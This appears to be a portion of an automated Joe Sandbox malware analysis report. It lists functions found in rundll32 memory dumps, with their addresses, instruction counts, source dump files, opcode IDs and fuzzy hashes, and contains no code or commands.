                                                                                                                                                                                                                                                                                                • Instruction ID: da29eb9de74881296a525c791747fe8e9ab2132c4447ebb5906be04607856ed3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e852275eff0a3657a1562ed1294952df4ed28697b660da19cd24e2ce0b5a0c48
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6E0B674E0420CAFCB44EFE8D54559DFBF5EB48300F0081AAE809E7364EA385A448F81
                                                                                                                                                                                                                                                                                                Function 06F93938 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 1d41c2ee3b7baf6aa00fe0e40ad9bbdd732633d38cd2ecd5cf50fbf155241def
                                                                                                                                                                                                                                                                                                • Instruction ID: 3d446a00468a11377cd2a944f9249a2ea6ac4f973b445812c9280b28bb065fb3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1d41c2ee3b7baf6aa00fe0e40ad9bbdd732633d38cd2ecd5cf50fbf155241def
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 71D02E12F4A3A02BCB1412B828182A87F8ECB42928F0104EBD988AB282C8298C0043B0
                                                                                                                                                                                                                                                                                                Function 06F946A0 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 3456414af0054f74eb723ed8fcc3dc14195d963fb5656af2be8cb3031492d6a4
                                                                                                                                                                                                                                                                                                • Instruction ID: 5fc18e6c46acaaa1c61f53d4ca880fe5f9d8e5a4e89404f7d90c7ac8e81a4ef5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3456414af0054f74eb723ed8fcc3dc14195d963fb5656af2be8cb3031492d6a4
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4BD05EB040A3897FC7418B648802896FFBC8E1330070142C6F8449B222D1264D10C3A2
                                                                                                                                                                                                                                                                                                Function 06F90C0C Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 640ec22e2e1c5fbbb57614c916ed9c51730d9ed93ec820530e66a3f0d080fc97
                                                                                                                                                                                                                                                                                                • Instruction ID: 3a65fba6c11eff4a4a3c801d4c5e7ca170108886f9dc94e827aa43b2bfbfdf9a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 640ec22e2e1c5fbbb57614c916ed9c51730d9ed93ec820530e66a3f0d080fc97
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9FD0A7332241186B6B586658DC8997ABB99E7943613104437FA0283264CD60AC5087E5
                                                                                                                                                                                                                                                                                                Function 06F93D10 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 4cb9b4df1829abc918e1aca4e58b15d00c4c696ce201ab978ce3ccf8407b294e
                                                                                                                                                                                                                                                                                                • Instruction ID: 5a81ef50907397d237590ab075185e415cadebc378bb344bc4579d20e62c1be5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4cb9b4df1829abc918e1aca4e58b15d00c4c696ce201ab978ce3ccf8407b294e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7FD05E70A0010DEFCB44DFB8EA0155EBBF9EB44204B1042A9D808D3340EF316F109BD0
                                                                                                                                                                                                                                                                                                Function 06F90440 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: e6f74bb5145fb4bbfddd4884e86baf889164b92669710f17fe34e21095db69a6
                                                                                                                                                                                                                                                                                                • Instruction ID: 7c2e3a2e66442263411eeaab929e2582eac3e3ef5744506cb1c1ffbcbb00d70e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e6f74bb5145fb4bbfddd4884e86baf889164b92669710f17fe34e21095db69a6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7BC01273D0E7D06FD61241580C448D69F21A5B310438D42D7D04189016D14D45BBC2B1
                                                                                                                                                                                                                                                                                                Function 06F9E32A Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 36104018c4642ebdaf0eb5db98033213f8d51690c09c9bd4f20b57f6ef7c8eac
                                                                                                                                                                                                                                                                                                • Instruction ID: 9ed027c4426f59c5a73e4e32bf527a8f102b1aee02434a26f80447c647c792ac
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36104018c4642ebdaf0eb5db98033213f8d51690c09c9bd4f20b57f6ef7c8eac
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5CE01230E1460FCBEF54DFE0C556BAE7B71BF04705F204419D401A6254DB788506CF91
                                                                                                                                                                                                                                                                                                Function 06F92968 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: e2086564231d39d5b7348abc6b6a7a8909eac3305700985937d9904833a2333b
                                                                                                                                                                                                                                                                                                • Instruction ID: 7a01cfa6e7056615cbe96e8cb6b6064cf1dc1cd1169cb6d0238cd6dddf4dab71
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e2086564231d39d5b7348abc6b6a7a8909eac3305700985937d9904833a2333b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 12D05E74905209DFCB00DFB4EA05A5DBBF9EB44200B2196A69404D3224EA306F108BC0
                                                                                                                                                                                                                                                                                                Function 06F93C98 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: b39f74d62886cc1349675d1c820487894433795d9a6c624e9663cd57c96c9468
                                                                                                                                                                                                                                                                                                • Instruction ID: fd42b94daf89fd0c870d9afd0a0bb3cd07952cb07af8f627d0239a8ec344f06c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b39f74d62886cc1349675d1c820487894433795d9a6c624e9663cd57c96c9468
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3CD01231724618CFDF8CEBA8E55653577E9EB8860430088ACA90FC7341DF2AF802C691
                                                                                                                                                                                                                                                                                                Function 06F946B0 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 30e2a52cc805db14efe13f145cadc85be56d2a932191a4332fb4aca8ba197b87
                                                                                                                                                                                                                                                                                                • Instruction ID: 8852bc75330cb5a187c575a93f3f2af58861646f397a09c9751e9f2e8b52842f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 30e2a52cc805db14efe13f145cadc85be56d2a932191a4332fb4aca8ba197b87
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BEB0927094530CAF8620DB99990185ABBACDA0A310F0001D9F90887320D976E91056D1

                                                                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                                                                Function 06F9F7E8 Relevance: 7.6, Strings: 6, Instructions: 148COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: (oq$,oq$,oq$Hoq$`]pq$`]pq
                                                                                                                                                                                                                                                                                                • API String ID: 0-4238504177
                                                                                                                                                                                                                                                                                                • Opcode ID: ea6cf34d25bfab4031feff852929803cc12778179413c8a5ed30e789ef49079b
                                                                                                                                                                                                                                                                                                • Instruction ID: b4d24f4ad2f00c5039953669a6fb21cde7a624249d79debc17246b83294e6563
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ea6cf34d25bfab4031feff852929803cc12778179413c8a5ed30e789ef49079b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 20413B32F191248FEBE85B3ED41442D77EAEFCA62132500AAD106DB391CE25EC41C7E5

                                                                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                                                                Function 049750B8 Relevance: 1.5, Strings: 1, Instructions: 283COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: \V#m
                                                                                                                                                                                                                                                                                                • API String ID: 0-1157912448
                                                                                                                                                                                                                                                                                                • Opcode ID: ee39edba72a380e13e52b8ff97b3fe85d6982edee9e5ce9c6812d2e2513fc604
                                                                                                                                                                                                                                                                                                • Instruction ID: 516d150e06e27e7936a11c3accbee9c4b43d2652efeabc13c2b57e69a6abb696
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee39edba72a380e13e52b8ff97b3fe85d6982edee9e5ce9c6812d2e2513fc604
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8B18E70E00219EFDB50CFA9C88579DBBF2BF88324F158539D815AB694EB74A841CB81
                                                                                                                                                                                                                                                                                                Function 049759A8 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 091fa52f447c63e35f7ea31773f141fd03d388d772c720e01068e9df857911f5
                                                                                                                                                                                                                                                                                                • Instruction ID: 796719a05e2c001dff2da8e881b22c03273527b51b01321eb340e4a69812523c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 091fa52f447c63e35f7ea31773f141fd03d388d772c720e01068e9df857911f5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 70B16170E00209EFDB54CFA8C8817ADBBF6AF88324F198539D415EB754EB74A845CB81
                                                                                                                                                                                                                                                                                                Function 04971630 Relevance: 2.7, Strings: 2, Instructions: 156COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: $kq$$kq
                                                                                                                                                                                                                                                                                                • API String ID: 0-3550614674
                                                                                                                                                                                                                                                                                                • Opcode ID: 901622a2a0a3bedc1d5cdd72cbe13d1150df6641b4972393ff3eced271e206c5
                                                                                                                                                                                                                                                                                                • Instruction ID: 6cf1931b0d851be2496baae369b8496abf69389ae78eaa1ffc731d3d3a3c4232
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 901622a2a0a3bedc1d5cdd72cbe13d1150df6641b4972393ff3eced271e206c5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C551CD31B012098FCB15DF78D8516AEBBBAEBC9350F24807AE814D7364DA34AC41C7A0
                                                                                                                                                                                                                                                                                                Function 049750B7 Relevance: 1.5, Strings: 1, Instructions: 275COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: \V#m
                                                                                                                                                                                                                                                                                                • API String ID: 0-1157912448
                                                                                                                                                                                                                                                                                                • Opcode ID: 77a21bd3f6c04f3fc9a41c6955551156765e18e8b33f3c8c8b161dfc276a4231
                                                                                                                                                                                                                                                                                                • Instruction ID: 93b6e9f2e9f656c75efedc252cc47789f8bb4c187c5cd5dcd359f27427ce2441
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 77a21bd3f6c04f3fc9a41c6955551156765e18e8b33f3c8c8b161dfc276a4231
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9AB14C70E00219EFDB50CFA9C8857DDBBF5BF48324F158539D818AB6A4EB74A845CB81
                                                                                                                                                                                                                                                                                                Function 04971080 Relevance: 1.5, Strings: 1, Instructions: 212COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: (oq
                                                                                                                                                                                                                                                                                                • API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                • Opcode ID: 2819f3610eff94d1821fcfab164e28f60ad91fd03b89738ce87548716744c2b5
                                                                                                                                                                                                                                                                                                • Instruction ID: 473f6ffeca75e3255e598a1615ab7322ef1b45a00d40184f7cdff20ec58af4ff
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2819f3610eff94d1821fcfab164e28f60ad91fd03b89738ce87548716744c2b5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C671B635B00214DFDB089B79C955A6EBBA7EFC8710F148439E506EB3A4DE35EC428B51
                                                                                                                                                                                                                                                                                                Function 04970C1C Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: (oq
                                                                                                                                                                                                                                                                                                • API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                • Opcode ID: b61ea380547030029fbf28a9f0bd8ac621a92dca41726d9ada99ef89fe5239af
                                                                                                                                                                                                                                                                                                • Instruction ID: 1e64b3510d128de3f1e0ad1c27067429ae970ef3c3aec85812307799d4b629e1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b61ea380547030029fbf28a9f0bd8ac621a92dca41726d9ada99ef89fe5239af
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C51F430B042449FE7089B68E4657AE7BB7EFC8314F14886AD406E7386CE386C45CB91
                                                                                                                                                                                                                                                                                                Function 0497599C Relevance: .3, Instructions: 266COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: dc299f63b8625d562fc7ed029b0c2f3eb6ac12e8086e2d8aa6c315be4bb75d86
                                                                                                                                                                                                                                                                                                • Instruction ID: 4d3112e3ad993495bd2c4ff599fb11e026a079f0093a3237417f320f2befed48
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc299f63b8625d562fc7ed029b0c2f3eb6ac12e8086e2d8aa6c315be4bb75d86
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8B17E70E00209EFDB54CFA8C9817ADBBF5EF48324F198539D815EB694EB74A845CB81
                                                                                                                                                                                                                                                                                                Function 04971A48 Relevance: .1, Instructions: 131COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 2b8043d4885f8fa0456da0faaf3794c191995b0d5cb4da40fc49d0173aeefe1b
                                                                                                                                                                                                                                                                                                • Instruction ID: 748b2ad6ef46ffdcb4f74d7bd3044711d7e7c1917ecc43d0d8355b67b93df3b0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b8043d4885f8fa0456da0faaf3794c191995b0d5cb4da40fc49d0173aeefe1b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8318832704195BFC35AAA3CB81762E7B179BD2301B4994BBC640CF3A7DD24AC0283D9
                                                                                                                                                                                                                                                                                                Function 04972268 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 8af55c0981780bb972b1bcaaa0da9eb13126dc1f8dbd6514e86309f9ab2c99b8
                                                                                                                                                                                                                                                                                                • Instruction ID: 0d84fad4e238b0b85bc55ee94443322d7cff43dfc72f2c11b334a579bc71a8c5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8af55c0981780bb972b1bcaaa0da9eb13126dc1f8dbd6514e86309f9ab2c99b8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E541FA75B111149FCB54DF68D98099EBBB6FF88710B14817AE905EB364EB31EC41CB90
                                                                                                                                                                                                                                                                                                Function 04971072 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: e9ba63a5eb5f4bf67a952835238c3222964b68f7f82600e9d56d031109310a9e
                                                                                                                                                                                                                                                                                                • Instruction ID: 70262b766cd15fddcc7e59aea4fe38de12186068803b0c691b2bebfc38fbcca4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e9ba63a5eb5f4bf67a952835238c3222964b68f7f82600e9d56d031109310a9e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D112C31B0022497EB14CE699951AFFB7EBEBC8640F044436D906DB385EE74ED068791
                                                                                                                                                                                                                                                                                                Function 04972B18 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 6e5e7968d3bedc9d85db156afbc92be168246bec45025bdb81520ff9f05a5f2a
                                                                                                                                                                                                                                                                                                • Instruction ID: dec928c448407c5d9568c2ee613211aa2f685e4c0bbe9f3c719ad0b5f2625627
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e5e7968d3bedc9d85db156afbc92be168246bec45025bdb81520ff9f05a5f2a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A11C131B142284F8B95AB7C54101AEBBE6EFC4615B100579C50AD7384EF34DD428BE2
                                                                                                                                                                                                                                                                                                Function 04970F20 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 22710c522ff2474972e2b5f722783a5afb67ad8071fa35f25c367a1bed5a675c
                                                                                                                                                                                                                                                                                                • Instruction ID: a91731de376b01328644bf2b98c702a9d9b29d9cba871d29b6e7e7fa66643e90
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 22710c522ff2474972e2b5f722783a5afb67ad8071fa35f25c367a1bed5a675c
